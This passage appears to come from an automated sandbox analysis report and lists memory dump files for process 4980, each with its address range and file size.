              • memory/4980-106-0x00000000065A0000-0x00000000065A8000-memory.dmp

                Filesize

                32KB

              • memory/4980-65-0x0000000074000000-0x00000000747B0000-memory.dmp

                Filesize

                7.7MB

              • memory/4980-66-0x00000000033C0000-0x00000000033D0000-memory.dmp

                Filesize

                64KB

              • memory/4980-68-0x00000000033C0000-0x00000000033D0000-memory.dmp

                Filesize

                64KB

              • memory/4980-71-0x0000000006130000-0x0000000006484000-memory.dmp

                Filesize

                3.3MB